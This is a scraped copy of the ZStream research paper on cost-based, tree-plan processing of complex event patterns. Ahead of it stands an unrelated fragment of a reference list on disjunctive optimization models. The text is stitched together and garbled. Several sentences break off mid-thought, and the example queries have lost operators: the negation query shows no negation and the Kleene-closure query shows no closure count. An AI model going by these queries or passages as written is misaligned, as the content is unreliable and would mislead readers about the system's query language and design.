- Similar advice applies to the variables handling disjunction terms.

7. References

The following is a list of articles providing more complete material about disjunctive/hybrid models and the algorithms to solve them.

Balas, E.
Balas, E.
Balas, E.
Brooke A., Kendrick D. and Meeraus A.
Gil J.J. and Vecchietti A.
Gil J.J. and Vecchietti A.
Grossmann I.E.
Lee S. and Grossmann I.E.
Lee, S. and I.E. Grossmann
Raman R. and Grossmann I.E.
Sawaya, N.W. and Grossmann I.E.
Sawaya, N.W. and Grossmann I.E.
Turkay M. and Grossmann I.E.
Vecchietti A. and Grossmann I.E.
Vecchietti A. and Grossmann I.E.
Vecchietti, A., S. Lee and I.E. Grossmann
Vecchietti A. and Grossmann I.E.
ZStream: A cost-based query processor for adaptively detecting composite events

As Published: http://dx.doi.org/10.1145/1559845.1559867
Publisher: Association for Computing Machinery (ACM)
Version: Author's final manuscript
Citable link: http://hdl.handle.net/1721.1/72190
Terms of Use: Creative Commons Attribution-Noncommercial-Share Alike 3.0
Detailed Terms: http://creativecommons.org/licenses/by-nc-sa/3.0/

ZStream: A Cost-based Query Processor for Adaptively Detecting Composite Events

Yuan Mei, MIT CSAIL, Cambridge, MA, USA, meiyuan@csail.mit.edu
Samuel Madden, MIT CSAIL, Cambridge, MA, USA, madden@csail.mit.edu

ABSTRACT

Composite (or Complex) event processing (CEP) systems search sequences of incoming events for occurrences of user-specified event patterns. Recently, they have gained more attention in a variety of areas due to their powerful and expressive query language and performance potential. Sequentiality (temporal ordering) is the primary way in which CEP systems relate events to each other. In this paper, we present a CEP system called ZStream to efficiently process such sequential patterns. Besides simple sequential patterns, ZStream is also able to detect other patterns, including conjunction, disjunction, negation and Kleene closure. Unlike most recently proposed CEP systems, which use non-deterministic finite automata (NFA's) to detect patterns, ZStream uses tree-based query plans for both the logical and physical representation of query patterns. By carefully designing the underlying infrastructure and algorithms, ZStream is able to unify the evaluation of sequence, conjunction, disjunction, negation, and Kleene closure as variants of the join operator. Under this framework, a single pattern in ZStream may have several equivalent physical tree plans, with different evaluation costs. We propose a cost model to estimate the computation costs of a plan.
We show that our cost model can accurately capture the actual runtime behavior of a plan, and that choosing the optimal plan can result in a factor of four or more speedup versus an NFA-based approach. Based on this cost model and using a simple set of statistics about operator selectivity and data rates, ZStream is able to adaptively and seamlessly adjust the order in which it detects patterns on the fly. Finally, we describe a dynamic programming algorithm used in our cost model to efficiently search for an optimal query plan for a given pattern.

Categories and Subject Descriptors

H.4.m [Information Systems Applications]: Miscellaneous; D.2.8 [Software Engineering]: Metrics—complexity measures, performance measures

Permission to make digital or hard copies of all or part of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for profit or commercial advantage and that copies bear this notice and the full citation on the first page. To copy otherwise, to republish, to post on servers or to redistribute to lists, requires prior specific permission and/or a fee. SIGMOD '09, June 29–July 2, 2009, Providence, Rhode Island, USA. Copyright 2009 ACM 978-1-60558-551-2/09/06 ...$5.00.

Figure 1: An example NFA for processing the sequential pattern A followed by B followed by C

General Terms

Algorithms, Design, Experimentation, Performance

Keywords

Complex Event Processing, Streaming, Optimization, Algorithm

1. INTRODUCTION

Composite (or Complex) event processing (CEP) systems search sequences of incoming events for occurrences of user-specified event patterns. They have become more popular in a number of areas due to their powerful and expressive query language and performance potential [1]. Sequential queries (based on temporal ordering) are the primary way in which CEP systems relate events to each other.
Examples of sequential queries include tracing a car's movement in a predefined area (where a car moves through a series of places), detecting anomalies in stock prices (where the rise and fall of the price of some stocks is monitored over time), and detecting intrusions in network monitoring (where a specific sequence of malicious activities is detected). However, purely sequential queries are not enough to express many real-world patterns, which also involve conjunction (e.g., concurrent events), disjunction (e.g., a choice between two options) and negation, all of which make the matching problem more complex.

Currently, non-deterministic finite automata (NFA) are the most commonly used method for evaluating CEP queries [7, 8, 15]. As shown in Figure 1, an NFA represents a query pattern as a series of states that must be detected. A pattern is said to be matched when the NFA transitions into a final state. However, the previously proposed NFA-based approaches have three limitations that we seek to address in this work:

Fixed Order of Evaluation. NFA's naturally express patterns as a series of state transitions. Hence, current NFA-based approaches impose a fixed evaluation order determined by this state transition diagram. For example, the NFA in Figure 1 starts at state 1, transits to state 2

We develop a tree-based query plan structure for CEP. We show that ZStream is able to unify the evaluation of negation queries by almost an order of magnitude.

Our goal in this paper is not to demonstrate that an NFA-based approach is inherently inferior to a tree-based query approach, but to show that: 1. by carefully designing the underlying infrastructure and algorithms, a tree-based approach can process most CEP queries very efficiently, and, 2. without some notion of an optimal plan, as well as statistics and a cost model to estimate that optimal plan, any approach that uses a fixed evaluation order (whether based on NFA's or trees) is suboptimal.
The rest of the paper is organized as follows: Sections 2 and 3 introduce related work and the language, respectively. Section 4 presents the system architecture and operator algorithms; Section 5 discusses the cost model and optimization; Section 6 shows evaluation results.

2. RELATED WORK

CEP systems first appeared as trigger detection systems in active databases [5, 6, 9, 10] to meet requirements for active functionality not supported by traditional databases. Examples of such work include HiPAC [6], Ode [10], SAMOS [9] and Sentinel [5]. FSA-based systems, such as HiPAC and Ode, have difficulty supporting concurrent events, because transitions in FSAs inherently incorporate an order between states. Petri-net-based systems such as SAMOS are able to support concurrency, but such networks are very complex to express and evaluate. Like ZStream, Sentinel evaluates its event language using event trees, but it arbitrarily constructs a physical tree plan for evaluation rather than searching for an optimal plan, which, as we show, can lead to suboptimal plans.

Other research has tried to make use of string-based matching algorithms [13] and scalable regular expressions [12] to evaluate composite event patterns. These methods only work efficiently for strictly consecutive patterns, limiting the expressive capability of the pattern matching language. In addition, they typically focus on searching for common sub-expressions amongst multiple patterns rather than searching for an optimal execution plan for a single pattern.

To support both composite event pattern detection and high-rate incoming events, SASE [4, 15], a high performance CEP system, was recently proposed. It achieves good performance through a variety of optimizations. SASE is, however, NFA-based, inheriting the limitations of the NFA-based model described in Section 1. The Cayuga [7] CEP system is another recently proposed CEP system.
Since it is developed from a pub/sub system, it is also focused on searching for common sub-expressions amongst multiple patterns. In addition, Cayuga is also NFA-based; hence it too suffers from the limitations of the NFA-based model. Recently, commercial streaming companies like Stream-

Primitive events are predefined single occurrences of interest that cannot be split into any smaller events. Composite events are detected by the CEP system from a collection of primitive and/or other composite events. Single-class predicates are predicates that involve only one event class, and multi-class predicates are predicates that involve more than one event class. Primitive events arrive into the CEP system from various external event sources, while composite events are internally generated by the CEP system itself.
CEP queries have the following format (as in [15]):

PATTERN Composite Event Expressions
WHERE Value Constraints
WITHIN Time Constraints
RETURN Output Expression

The Composite Event Expressions describe an event pattern to be matched by connecting event classes together via different event operators; Value Constraints define the context for the composite events by imposing predicates on event attributes; Time Constraints describe the time window during which events that match the pattern must occur. The RETURN clause defines the expected output stream from the pattern query.

Query 1. Sequence Pattern
PATTERN T1; T2; T3
WHERE T1.name = T3.name
AND T2.name = 'Google'
AND T1.price > (1 + x%) * T2.price
AND T3.price < (1 - y%) * T2.price
WITHIN 10 secs
RETURN T1, T2, T3

Query 1 shows an example stock market monitoring query that finds a stock whose trading price is first x% higher than the following Google tick, and then y% lower, within 10 seconds. The stock stream has the schema (id, name, price, volume, ts). The symbol ";" in the PATTERN clause is an operator that sequentially connects event classes, meaning the left operand is followed by the right operand.

In our data model, each event is associated with a start-timestamp and an end-timestamp. For primitive events, the start-timestamp and end-timestamp are the same, in which case we refer to a single timestamp. Some CEP systems make the assumption that a composite event occurs at a single point in time (the end-timestamp, for instance), and ignore the event duration. This assumption makes the semantics of composite event assembly unclear. For example, suppose the composite event results generated from Query 1 are further used as inputs to another sequential pattern "A; B WITHIN tw". Then simply using the end-timestamps (to satisfy the new pattern's time window tw) may result in the total elapsed time between the start of A and the end of B exceeding the time bound tw.
In other words, simply matching on end-timestamp can result in composite events with an arbitrarily long occurrence duration. Hence, in ZStream, we require that composite events have a total duration less than the time bound specified in the WITHIN clause.

3.1 Event Operators

Event operators connect primitive or composite events together to form new composite events. This section briefly describes the set of event operators supported in our system, and presents more example queries.

Sequence (A; B): The sequence operator finds instances of event B that follow event A within a specified time window. The output is a composite event C such that A.end-ts < B.start-ts, C.start-ts = A.start-ts, C.end-ts = B.end-ts and C.end-ts − C.start-ts ≤ time window.

Negation (!A): Negation is used to express the non-occurrence of event A. This operator is usually used together with other operators; for example "A; !B; C" indicates that C follows A without any interleaving instances of B.

Conjunction (A & B): Conjunction (i.e., concurrent events) means that both event A and event B occur within a specified time window; their order does not matter.

Disjunction (A | B): Disjunction means either event A or event B or both occur within a specified time window. Since we allow both A and B to occur in disjunction, it is simply a union of the two event classes that also satisfies the time constraint.

Kleene Closure (A* / A+ / A^num): Kleene closure means that event A can occur zero or more (*) or one or more (+) times. ZStream also allows the specification of a closure count to indicate an exact number of events to be grouped. For example, A^5 means five A instances will be grouped together.

3.2 Motivating Applications

Sequential patterns are widely used in a variety of areas, from vehicle tracking to system monitoring. We have illustrated a typical sequential pattern in Query 1. In this section, we show several more sequential patterns from stock market monitoring.
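As a concrete illustration of the sequence operator's timestamp arithmetic described above, here is a minimal Python sketch (not ZStream's actual code; the event representation and function name are illustrative assumptions):

```python
# Minimal sketch of the Sequence (A; B) timestamp semantics described above.
# Events are (start_ts, end_ts) pairs; names and structure are illustrative,
# not ZStream's actual implementation.

def seq_compose(a, b, window):
    """Return the composite event C for A; B, or None if the pair
    violates the sequence or time-window constraints."""
    a_start, a_end = a
    b_start, b_end = b
    if not (a_end < b_start):          # A must strictly precede B
        return None
    c = (a_start, b_end)               # C.start-ts = A.start-ts, C.end-ts = B.end-ts
    if c[1] - c[0] > window:           # total duration must fit in the window
        return None
    return c

# A at [1, 2], B at [4, 6], window of 10 time units -> composite [1, 6]
print(seq_compose((1, 2), (4, 6), 10))   # (1, 6)
# B starts before A ends -> no match
print(seq_compose((1, 5), (4, 6), 10))   # None
```

Note that the composite's duration is measured from A's start to B's end, which is exactly the requirement that rules out arbitrarily long composite events.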
The input stream has the same schema as that of Query 1.

Query 2. Negation Pattern
PATTERN T1; T2; T3
WHERE T1.name = T2.name = T3.name
AND T2.price < x
AND T3.price > x * (1 + 20%)
WITHIN 10 secs
RETURN T1, T3

Query 3. Kleene Closure Pattern
PATTERN T1; T2; T3
WHERE T1.name = T3.name
AND T2.name = 'Google'
AND sum(T2.volume) > v
AND T3.price > (1 + 20%) * T1.price
WITHIN 10 secs
RETURN T1, sum(T2.volume), T3

Query 2 illustrates a negation pattern to find a stock whose price increases 20% from some threshold price x without any lower price in between during a 10 second window. Query 3 shows a Kleene closure pattern that aggregates the total trading volume of Google stock. This pattern is used to measure the impact on other stocks' prices after high-volume trading of Google stock. The closure count constrains the number of successive Google events in the Kleene closure to 5; the aggregate function sum() is applied to the attribute volume of all the events in the closure.

Figure 3: A left-deep tree plan for Query 1

4. ARCHITECTURE AND OPERATORS

In this section, we describe the system architecture and evaluation of query plans, as well as algorithms for operator evaluation.

4.1 Tree-Based Plans

To process a query, ZStream first parses and transforms the query expression into an internal tree representation.
Leaf buffers store primitive events as they arrive, and internal node buffers store the intermediate results assembled from sub-tree buffers. Each internal node is associated with one operator in the plan, along with a collection of predicates. ZStream assumes that primitive events from data sources continuously stream into leaf buffers in time order. If disorder is a problem, a reordering operator may be placed just after the leaf buffer. ZStream uses a batch-iterator model (see Section 4.3) that collects batches of primitive events before processing at internal nodes; batches are processed to form more complete composite events that are eventually output at the root.

Figure 3 shows a tree plan for Query 1. This is a left-deep plan, because T1 and T2 are first combined, and their outputs are matched with T3. A right-deep plan, where T2 and T3 are first combined and then matched with T1, is also possible.

Single-class predicates (over just one event class) can be pushed down to the leaf buffers, preventing irrelevant events from being placed into leaf buffers. For example, "T2.name = 'Google'" can be pushed down to the front of the T2 buffer, such that only the events whose names equal 'Google' are placed into the buffer. More complicated constraints specified via multi-class predicates are associated with internal nodes. For example, the first sequential relation in Query 1 has the multi-class predicate "T1.price > (1 + x%) * T2.price" associated with it; hence this predicate is attached to the SEQ1 node. Events coming from the associated sub-trees are passed into the internal nodes for combination, and multi-class predicates are applied during this assembly procedure. Notice that equality multi-class predicates can be further pushed to the leaf buffers by building hash partitions on the equality attributes.
For instance, the equality predicate "T1.name = T3.name" of Query 1 can be expressed as hashing on T1.name and performing name lookups at the SEQ2 node. Other operators can be represented in the tree model similarly; we describe ZStream's operator implementations in Section 4.4.

4.2 Buffer Structure

For each node of the tree plan, ZStream has a buffer to temporarily store incoming events (for leaf nodes) or intermediate results (for internal nodes). Each buffer contains a number of records, each of which has three parts: a vector of event pointers, a start time and an end time. If the buffer is a leaf buffer, the vector contains just one pointer to the incoming primitive event, and both the start time and end time are the timestamp of that primitive event. If the buffer contains intermediate results, each entry in the event vector points to a component primitive event of the assembled composite event, and the start time and end time are the timestamps of the earliest and latest primitive events comprising this composite event.

One important feature of the buffer is that its records are stored sorted in end-time order. Since primitive events are inserted into their leaf buffers in time order, records in leaf buffers are automatically sorted by end time. For each internal (non-leaf) buffer, the node's operator is designed in such a way that it extracts records from its child buffers in end-time order and also generates intermediate results in end-time order. This buffer design facilitates time-range matching for sequential operations. In addition, the explicit separation of the start and end time facilitates time comparison between two buffers A and B in either direction (i.e., A to B and B to A), so that: 1. It is possible for ZStream to efficiently locate tuples in leaf buffers, so that ZStream can flexibly choose the order in which it evaluates the leaf buffers; 2.
It is possible for ZStream to efficiently locate tuples in internal node buffers matching a specific time range, so that materialization can be used; and 3. ZStream can support conjunction by efficiently joining events from either buffer with the other buffer. In addition, by keeping records in end-time order in its buffers, ZStream does not perform any unnecessary time comparisons: since each operator evaluates its input in end-time order, events outside the time range can be discarded once the first out-of-time event is found. Other buffer designs, based, for example, on pointers from later buffers to matching time ranges in earlier buffers (such as the RIP pointers used in [15]), make flexible reordering difficult for sequential patterns.

### 4.3 Batch-Iterator Model

For sequential patterns, an output can only be generated when an instance of the final event class occurs (e.g., \( B \) in the pattern \( A; B \)). If events are combined whenever new events arrive, previously combined intermediate results may stay in memory for a long time, waiting for an event from the final event class to arrive. If no events arrive from the final event class for a long time, these intermediate results are very likely to be discarded without ever being used. Hence, ZStream accumulates events in leaf buffers in idle rounds, and performs evaluation to populate internal buffers and produce outputs in assembly rounds, only after there is at least one instance \( f \) in the final event class's buffer. During assembly, the system computes an earliest allowed timestamp (EAT) based on \( f \)'s timestamp. More specifically, the EAT in each assembly round is calculated by subtracting the time-window constraint from the earliest end-timestamp of the events in the final event class's buffer. Any event with a start time earlier than the EAT cannot possibly satisfy the pattern and can be discarded without further processing.
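As a concrete illustration, the record layout of Section 4.2 and the EAT computation can be sketched in Python. The names (`Event`, `Record`, `leaf_record`, `earliest_allowed_ts`) are illustrative, not ZStream's actual API:

```python
# Sketch only: a buffer record holds a vector of pointers to component
# primitive events plus a start and end timestamp; buffers keep records
# sorted by end time.
from dataclasses import dataclass, field
from typing import List

@dataclass
class Event:
    ts: int                                  # timestamp of a primitive event
    payload: dict = field(default_factory=dict)

@dataclass
class Record:
    events: List[Event]                      # component primitive events
    start_ts: int                            # earliest component timestamp
    end_ts: int                              # latest component timestamp

def leaf_record(e: Event) -> Record:
    # A leaf record wraps one primitive event; start and end coincide.
    return Record([e], e.ts, e.ts)

def earliest_allowed_ts(final_buffer: List[Record], window: int) -> int:
    # EAT = earliest end-timestamp in the final event class's buffer
    # minus the time-window constraint; records whose start time falls
    # before the EAT can never satisfy the pattern and may be discarded.
    return min(r.end_ts for r in final_buffer) - window
```

For example, with a final-class buffer containing events at times 120 and 150 and a window of 100 units, the EAT is 20, so any record starting before time 20 can be dropped.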
Specifically, the batch-iterator model consists of the following steps:

1. A batch of primitive events is read into leaf buffers with the predefined batch size;
2. If there is no event instance in the final event class's leaf buffer, go back to step 1; otherwise, go to step 3;
3. Calculate the EAT and pass it down from the root to each buffer;
4. Assemble events from leaves to root, storing the intermediate results in their corresponding node buffers, and removing out-of-date records, according to the implementation of each operator (see Section 4.4).

Notice that steps 1-2 belong to idle rounds, which accumulate enough primitive events, and steps 3-4 belong to assembly rounds, which perform the composition work. For in-memory pattern matching, memory consumption is an important issue. By taking advantage of the batch-iterator model and evaluating the time-window constraints as early as possible (the EAT is pushed to the leaf buffers), ZStream can bound its memory usage efficiently. We show this by reporting the peak memory usage in Section 6.

### 4.4 Operator Evaluation

In this section, we describe the algorithms for operator evaluation.

#### 4.4.1 Sequence

Each sequence operator has two operands, representing the first and second event class in the sequential pattern. The algorithm used in each assembly round for sequence evaluation is as follows:

```
Input:  right and left child buffers RBuf and LBuf, EAT
Output: result buffer Buf
1  foreach Rr in RBuf do
2      if Rr.start-ts < EAT then remove Rr; continue;
3      for Lr = LBuf[0]; Lr.end-ts < Rr.start-ts; Lr++ do
4          if Lr.start-ts < EAT then remove Lr; continue;
5          if Lr and Rr satisfy the value constraints then
6              combine Lr and Rr and insert into Buf
7  clear RBuf
```

**Algorithm 1:** Sequence Evaluation

To make sure the intermediate results are generated in end-time order, the right buffer is used in the outer loop, and the left buffer in the inner one. In the algorithm, steps 2 and 4 incorporate the EAT constraint into the sequence evaluation. We assume that all events arriving in earlier rounds have smaller timestamps than those arriving in later rounds. This means that for a sequence node, after the assembly work is done, records in the node's right child buffer will not be used any more, because all possible events that could be combined with them have already passed through the left child buffer and the combined results have been materialized. Hence, step 7 clears the sequence node's right child buffer.

#### 4.4.2 Negation

Negation represents events that have not occurred. It must be combined with other operators, such as sequence and conjunction; ZStream does not allow negation to appear by itself, as there is no way to represent the absence of an occurrence. Though we could add a special "did not occur" event, it is unclear what timestamp to assign such events or how frequently to output them. Semantically, it also makes little sense to combine negation with disjunction (i.e., \( !A \lor B \)) or Kleene closure (i.e., \( (!A)^* \)). Negation is more complicated than other operators because it is difficult to represent and assemble all possible non-occurrence events. If events specified in the negation clause occur, they can cause previously assembled composite events to become invalid.
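Algorithm 1's merge-style traversal over end-time-sorted buffers can be sketched in Python. This is a simplification: `satisfies` stands in for the node's multi-class predicates, and out-of-date records are skipped rather than physically removed:

```python
# Sketch of one assembly round of SEQ over buffers sorted by end time.
from dataclasses import dataclass
from typing import Callable, List

@dataclass
class Rec:
    start_ts: int
    end_ts: int
    events: list

def eval_seq(lbuf: List[Rec], rbuf: List[Rec], eat: int,
             satisfies: Callable[[Rec, Rec], bool]) -> List[Rec]:
    out = []
    for rr in rbuf:                        # right buffer drives the outer loop
        if rr.start_ts < eat:
            continue                       # out-of-date (step 2)
        for lr in lbuf:
            if lr.end_ts >= rr.start_ts:   # buffers sorted by end time:
                break                      # stop at the first non-match
            if lr.start_ts < eat:
                continue                   # out-of-date (step 4)
            if satisfies(lr, rr):
                out.append(Rec(min(lr.start_ts, rr.start_ts),
                               max(lr.end_ts, rr.end_ts),
                               lr.events + rr.events))
    rbuf.clear()                           # step 7: right buffer fully consumed
    return out                             # emitted in end-time order
```

Because every combined record ends at its right component's end time, iterating the right buffer in end-time order is what guarantees the output is also in end-time order.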
One way to solve this problem is to add a negation filter on top of the plan to rule out composite events in which events specified in the negation part occurred, as has been done in previous work [15]. An obvious problem with this filter-last solution is that it generates a number of intermediate results, many of which may eventually be filtered out. A better solution, which we discuss in this section, is to push negation down to avoid unnecessary intermediate results. Negation evaluation is performed using the NSEQ operator. The key insight of the NSEQ operator is that it can find the time ranges in which non-negation events can produce valid results. Consider a simplified pattern "\( A; !B; C \text{ WITHIN } tw \)", where \( tw \) is a time constraint. For an event instance \( c \) of \( C \), suppose there exists a negation event instance \( b \) of \( B \) such that 1. any event instance of \( A \) that occurred before \( b \) does not match with \( c \) (because it is negated by \( b \)), and 2. conversely, any instance of \( A \) that occurred after \( b \) and before \( c \) definitely matches with \( c \) (because it is not negated by \( b \)). In this case, we say \( b \) negates \( c \). Thus, the NSEQ operator searches for a negation event that negates each non-negation event instance (each instance of \( C \) in the above example). Figure 4(left) illustrates a right-deep plan for Query 2. Hash partitioning is performed on the incoming stock stream to apply the equality predicates on stock.name. NSEQ is applied to find an event instance \( t_2 \) of \( T_2 \) that negates each event instance \( t_3 \) of \( T_3 \). The output from \( NSEQ \) is a combination of such \( t_2 \) and \( t_3 \). In addition, the extra time constraints \( T_1.start\text{-}ts \geq T_2.start\text{-}ts \) and \( T_1.start\text{-}ts < T_3.start\text{-}ts \) are added to the \( SEQ \) operator, which takes the output of \( NSEQ \) as an input.
These time constraints determine the range of event instances of \( T_1 \) that can be combined directly with the events output from \( NSEQ \). Thus, this plan can dramatically reduce the number of unnecessary intermediate results. We now discuss the evaluation of \( NSEQ \); we assume that negation events are primitive. Figure 5 illustrates the execution of the simplified pattern "\( A; !B; C \) WITHIN \( tw \)". In such cases, the event that negates \( c \) of \( C \) is the latest negation event instance \( b \) that causes \( c \) to become invalid. For instance, \( b_3 \) negates \( c_5 \), which is recorded as "\( b_3, c_5 \)" in the \( NSEQ \) buffer. The time predicates \( A.end\text{-}ts < C.start\text{-}ts \) and \( A.end\text{-}ts \geq B.start\text{-}ts \) are pushed into the \( SEQ \) operator. These indicate that, due to negation, only event instances of \( A \) in the time range \([3, 5]\) should be considered (i.e., \( a_4 \)). Finally, the composite result "\( a_4, c_5 \)" is returned. The algorithm to evaluate \( NSEQ \) when its left child is a negation event class is shown in Algorithm 2. \( NSEQ \) works much like \( SEQ \) except that the left buffer is looped through from the end to the beginning, and only negation events that negate events from the right buffer are combined and inserted into the result buffer (steps 7–9). When no negation event can be found to negate an instance from the right buffer, (\( NULL \), \( Rr \)) is inserted into the result buffer instead (steps 5 and 10). The algorithm to evaluate \( NSEQ \) where the right child is a negation class ("\( B; !C \)") can be constructed similarly; in this case, the event that negates each \( b \) should be the first event from \( C \) that arrives after \( b \) and also passes all predicates. Notice that Algorithm 2 only works when the negation event class's multi-class predicates all apply to just one of the non-negation classes. If the negation event class has multi-class predicates over more than one non-negation event class, locating the direct matching range is trickier.
Some of the valid composite components may have been filtered out in \( NSEQ \), because \( NSEQ \) only contains the predicate information of two event classes. To solve this problem, more sophisticated extra predicates would need to be added and more composed components saved, which may cancel out the benefits of \( NSEQ \). Hence, ZStream applies a negation operator at the top of the query plan rather than using \( NSEQ \) in such cases.

### 4.4.3 Conjunction

Conjunction is similar to sequence except that it does not distinguish between the orders of its two operands, as it assembles events in both directions. The evaluation algorithm is shown in Algorithm 3. It is designed to work like a sort-merge join. It maintains a cursor on each input buffer (\( Lr \) and \( Rr \)), initially pointing to the oldest not-yet-matched event in each buffer. In each step of the algorithm, it chooses the cursor pointing at the earlier event \( c \) (lines 3–7), and combines \( c \) with all earlier events in the other cursor's buffer (lines 8–9). This algorithm produces events in end-time order, since it processes the earliest event at each step.

### 4.4.4 Disjunction

Disjunction simply outputs the union of its inputs, so its evaluation is straightforward: either input can be directly inserted into the operator's output buffer if it meets both the time and value constraints. Specifically, the output of disjunction is generated by merging events in the left buffer and the right buffer according to their end time. ZStream does not materialize results from the disjunction operator because, most of the time, they will simply be a copy of the inputs.

### 4.4.5 Kleene Closure

Figure 4(right) shows a tree plan for Query 3. The input stock stream is first hash partitioned on \( stock.name \), and the \( Google \) buffer can be shared across all the partitions. Kleene closure evaluation (KSEQ) is illustrated in Figure 6.

Figure 6: Example KSEQ evaluation for the patterns "A; B^2; C^3" and "A; B^*; C^*"

## 5. COST MODEL AND OPTIMIZATIONS

This section presents the cost model and optimization techniques used in ZStream. Based on the cost model, ZStream can efficiently search for the optimal execution plan for each sequential query. We also show that our evaluation model can easily and seamlessly adapt to a more optimal plan on the fly, and present optimizations that use hashing to evaluate equality predicates.

### 5.1 Cost Model

In traditional databases, the estimated cost of a query plan consists of I/O and CPU costs. In ZStream, I/O cost is not considered because all primitive events are memory resident. ZStream computes the CPU cost of each operator from three terms: the cost to access the input data, the cost of predicate evaluation and the cost to generate the output data. These costs are measured as the number of input events accessed and the number of output events combined. Formally, the cost \( C \) is:

\[ C = C_i + (nk)C_i + pC_o \quad (1) \]

Here, the cost consists of three parts: the cost of accessing the input data \( C_i \), the cost to generate the output data \( pC_o \) and the cost of predicate evaluation \( (nk)C_i \), where \( n \) is the number of multi-class predicates the operator has (which cannot be pushed down), and \( k \) and \( p \) are weights. \( C_i \) and \( C_o \) stand for the cost of accessing input data and assembling output results, respectively. Since both of them are measured in terms of the number of events touched, the weight \( p \) is set to 1 by default, which we have experimentally determined to work well. \( (nk)C_i \) stands for the cost of predicate evaluation; since predicate evaluation is performed while accessing the input data, its cost is proportional to \( C_i \). Based on our experiments, \( k \) is estimated to be 0.25 in ZStream. Table 1 shows the terminology that we use in the rest of this section. \( R_E \) denotes the number of events per unit time.
Hence \( R_E \ast TW_P \ast Pr_E \) can be used as an estimate of \( CARD_E \) (all instances of \( E \) that are active within the time period \( TW_P \)). Consider the plan shown in Figure 3; the \( CARD \) of \( T_2 \) is \( R_{STOCK} \ast Pr_{T2} \ast (10\,sec) \), where \( Pr_{T2} \) is the selectivity of the predicate "\( T_2.name = \text{'Google'} \)". Sequential operators such as SEQ, KSEQ and NSEQ have implicit time constraints. \( Pt_{E1,E2} \) is used to measure the selectivity of such implicit time predicates. For example, the pattern "\( E1; E2 \)" implicitly includes a time predicate "\( E1.end\text{-}ts < E2.start\text{-}ts \)", indicating that only event instances \( e_1 \) of \( E_1 \) that occur before instances \( e_2 \) of \( E_2 \) can be combined with \( e_2 \). \( Pt_{E1,E2} \) does not apply to the cost formulas for conjunction and disjunction, as they are not sequential. \( P_{E1,E2} \) is similar to \( Pt_{E1,E2} \) except that it also includes the selectivity of all multi-class predicates between \( E_1 \) and \( E_2 \). Table 2 summarizes the input cost formulas (\( C_i \)) and output cost formulas (\( C_o \)) for each individual operator. The input cost \( C_i \) is expressed in terms of the number of input events that are compared and/or combined; the output cost \( C_o \) is measured as the number of composite events generated by the operator (i.e., \( CARD_O \)). The total cost of an individual operator is the sum of its input cost, predicate cost and output cost, as indicated in Formula 1. The implicit time selectivity \( Pt_{A,B} \) is attached to the sequence operator's input cost formula because the buffer structure automatically filters out all event instances \( a \) of \( A \) with \( a.end\text{-}ts > b.start\text{-}ts \) for each event instance \( b \) of \( B \). The evaluation of conjunction and disjunction is independent of the order of their inputs; hence time predicates do not apply to their cost formulas. For disjunction, multi-class predicates are not included because an event on either of the two inputs can result in an output.
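Formula 1 combined with the Table 2 entry for sequence can be turned into a small numeric sketch. Assumptions: \( k = 0.25 \) and \( p = 1 \) as stated above, and the output cardinality is read as \( CARD_A \ast CARD_B \ast P_{A,B} \) per the definitions of \( Pt \) and \( P \) in the text; the function name is illustrative:

```python
# Sketch: total cost of a SEQ operator per Formula 1,
#   C = C_i + (n k) C_i + p C_o
# with C_i = CARD_A * CARD_B * Pt_AB (input combinations tried)
# and  C_o = CARD_A * CARD_B * P_AB  (composite events generated).
K, P_WEIGHT = 0.25, 1.0          # defaults stated in the text

def seq_cost(card_a, card_b, pt_ab, p_ab, n_preds):
    c_in = card_a * card_b * pt_ab       # input cost
    card_out = card_a * card_b * p_ab    # output cardinality CARD_O
    total = c_in + (n_preds * K) * c_in + P_WEIGHT * card_out
    return total, card_out

# e.g. 100 x 100 inputs, time selectivity 0.5, full selectivity 0.25,
# one multi-class predicate:
cost, card = seq_cost(card_a=100, card_b=100, pt_ab=0.5, p_ab=0.25, n_preds=1)
```

With these numbers the input cost is 5000 combinations, predicate evaluation adds a quarter of that, and 2500 composite events are produced.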
The cost for Kleene closure is more complicated. If the closure count \( cnt \) is not specified, exactly one group with the maximal number of closure events is output for each start-end pair. The number of accessed event instances \( N \) from the middle input \( B \) can be estimated as the number of events from \( B \) that match each start-end pair. So \( N = CARD_B \ast Pt_{A,B} \ast Pt_{B,C} \), where \( A \) and \( C \) represent the start and end event classes. If the closure count \( cnt \) is specified, then for any start-end pair, each event instance from \( B \) that occurs in between this pair will be output \( cnt \) times on average. Hence \( N = CARD_B \ast Pt_{A,B} \ast Pt_{B,C} \ast cnt \). ZStream has two ways to evaluate negation. One is to put a negation filter on top of the whole plan to rule out negated events. The other is to use an NSEQ operator to push the negation into the plan. The cost of the first method (\( NEG(SEQ(A, C), B) \)) includes two parts: the cost of the SEQ operator and that of NEG. The cost of SEQ can be estimated as above. The input cost for NEG is \( CARD_{SEQ} \). It is not related to \( CARD_B \) because the composite results from SEQ can be thrown out once an instance \( b \) of \( B \) between \( A \) and \( C \) is found; ZStream can find such a \( b \) by finding the event that negates each \( c \) of \( C \), and hence it does not need to scan \( B \). The cost of the second approach (\( SEQ(A, NSEQ(B, C)) \)) also contains two parts: the cost to evaluate the NSEQ operator and the cost to evaluate the SEQ operator. The input cost of the NSEQ is \( CARD_C \) and is not related to \( CARD_B \), because ZStream can find each \( c \)'s negating event (which is just the latest event in \( B \) before \( c \)) directly, without searching the entire \( B \) buffer. The cost formulas shown in Table 2 assume that the operands of each operator are primitive event classes. They can easily be generalized to the case where the operands are themselves operators by substituting the cardinality of primitive event classes with the cardinality of operators.
Then, the cost of an entire tree plan can simply be estimated by adding up the costs of all the operators in the tree.

### 5.2 Optimal Query Plan

Our goal is to find the best physical query plan for a given logical query pattern. To do this, we define the notion of an equivalent query plan: a query plan \( p' \) with a different ordering or collection of operators that produces the same output as some initial plan \( p \). In particular, we study three types of equivalence: rule-based transformations, hashing for equality multi-class predicates, and operator reordering.

#### 5.2.1 Rule-Based Transformations

As in relational systems, there are a number of equivalent expressions for a given pattern. For example, the following two expressions are semantically identical:

1. \( Expression_1: ((A \& B) \lor (A \& C)); D \)
2. \( Expression_2: (A \& (B \lor C)); D \)

